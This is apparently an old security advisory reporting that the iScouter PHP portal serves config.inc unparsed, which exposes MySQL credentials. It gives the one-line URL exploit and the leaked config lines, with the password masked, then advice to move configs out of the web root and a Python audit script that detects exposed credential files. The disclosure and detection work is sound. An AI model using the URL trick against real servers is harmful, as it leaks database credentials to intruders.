COMMAND

    iScouter PHP Web Portal System

SYSTEMS AFFECTED

    iScouter PHP Web Portal System

PROBLEM

    Cabezon Aurélien found the following.  He has found that he can
    easily retrieve the MySQL password of the latest iScouter PHP Web
    Portal System.

    Exploit:

        www.your-iScouter-web-portal.com/config.inc

    The server returns the file unparsed, so these lines can be read in
    clear text:

        $CFG_DB_SERVERTYPE = "mySQL";
        $CFG_DB_HOST = "www.your-iScouter-web-portal.com";
        $CFG_DB_USERNAME = "root";
        $CFG_DB_PASSWORD = "xxxxxxxxx";
        $CFG_DB_NAME = "iscouter";

        CFG_DB_SERVERTYPE: Database Server Type, you need check with
                           system_config.inc to find whether your database
                           server is supported in current version
        CFG_DB_HOST:       Database Hostname
        CFG_DB_USERNAME:   Database Username
        CFG_DB_PASSWORD:   Database Password
        CFG_DB_NAME:       Database Name

SOLUTION

    You should rename "config.inc" to "config.inc.php" and don't forget
    to update the files that include it.

    Any configuration file, for example one holding database access
    details, should be stored in a different location than the web
    html/php files, *outside* of the webserver's scope.  This has been
    discussed a lot of times here.

    Think about the day your web server will stop parsing php files for
    some reason: a renamed "config.inc.php" left inside the web root
    would then be served in clear text as well.
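
    An audit check for the two recommendations above, as an added
    example that is not part of the original advisory or of iScouter.
    It walks a document root and lists files holding credential
    assignments such as $CFG_DB_PASSWORD.  The ".php"-only handler
    mapping, the regex and the function name are assumptions of this
    example.

```python
import os
import re
import tempfile

# Assumption: only these extensions are mapped to the PHP handler.
PHP_PARSED = {".php"}

# Credential-like PHP assignment, e.g. $CFG_DB_PASSWORD = "xxxxxxxxx";
SECRET_RE = re.compile(r"""\$\w*(?:PASSWORD|PASSWD|PWD)\w*\s*=\s*["'][^"']*["']""", re.IGNORECASE)


def find_exposed_configs(docroot, trust_php_handler=True):
    """Return sorted paths (relative to docroot) of files holding credentials.

    trust_php_handler=True  -> flag only files the server returns as plain
                               text (the config.inc case).
    trust_php_handler=False -> flag every credential file inside docroot,
                               i.e. what leaks if PHP parsing ever stops.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            ext = os.path.splitext(name)[1].lower()
            if trust_php_handler and ext in PHP_PARSED:
                continue  # executed by PHP, source not sent to the client
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="replace") as fh:
                    text = fh.read(1 << 20)  # first 1 MiB is enough for a config
            except OSError:
                continue  # unreadable file: skip rather than abort the audit
            if SECRET_RE.search(text):
                hits.append(os.path.relpath(path, docroot))
    return sorted(hits)


if __name__ == "__main__":
    # Constructed sample document root, built in a temp dir so this runs offline.
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "config.inc": '$CFG_DB_PASSWORD = "xxxxxxxxx";\n',
            "config.inc.php": '<?php $CFG_DB_PASSWORD = "xxxxxxxxx"; ?>\n',
            "index.php": '<?php include "config.inc.php"; ?>\n',
        }
        for name, body in samples.items():
            with open(os.path.join(root, name), "w") as fh:
                fh.write(body)
        print("served as text today:", find_exposed_configs(root))
        print("exposed if PHP stops:", find_exposed_configs(root, False))
```

    An empty result from the second call means no credential file is
    left inside the web root, which is the state the solution asks for.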